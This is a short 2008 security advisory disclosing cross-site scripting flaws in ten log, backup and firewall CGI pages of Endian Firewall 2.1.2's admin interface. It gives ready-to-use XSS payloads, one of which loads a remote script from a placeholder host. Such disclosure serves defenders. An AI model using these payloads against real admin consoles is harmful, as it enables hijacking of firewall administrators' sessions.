#Security Advisory - Multiple Vulnerabilities in Endian firewall# 

Endian Firewall is a "turn-key" linux security distribution that turns every system into a full featured security appliance. It features stateful packet filtering, proxies, antivirus/antispam, content filtering and a VPN module.

Date            : 02-12-2008
Product         : Endian Firewall
Version         : 2.1.2 - Prior version maybe also be affected
Vendor          : http://www.endian.com/en/
Author          : syniack
Contact         : syniack@gmail.com
S.Page          : http://bsecure.net.pk

XSS Vulnerability: [TESTED]

Security issue in the following files:


https://example:10443/cgi-bin/logs_siproxy.cgi
https://example:10443/cgi-bin/logs_clamav.cgi
https://example:10443/cgi-bin/logs_smtp.cgi
https://example:10443/cgi-bin/logs_log.cgi
https://example:10443/cgi-bin/logs_proxy.cgi
https://example:10443/cgi-bin/logs_firewall.cgi
https://example:10443/cgi-bin/logs_ids.cgi
https://example:10443/cgi-bin/logs_dansguardian.cgi
https://example:10443/cgi-bin/backup.cgi
https://example:10443/cgi-bin/outgoingfw.cgi

Example:

"><script src=http://www.example.com/re.js></script>

"><script>alert(1);</script>

Image Example Url:

http://img158.imageshack.us/my.php?image=endian02122008yu3.jpg
http://img150.imageshack.us/my.php?image=endian03122008openvpnxq5.jpg
http://img201.imageshack.us/my.php?image=endian05122008backupat3.jpg
http://img201.imageshack.us/my.php?image=endian06122008outgoingfla5.jpg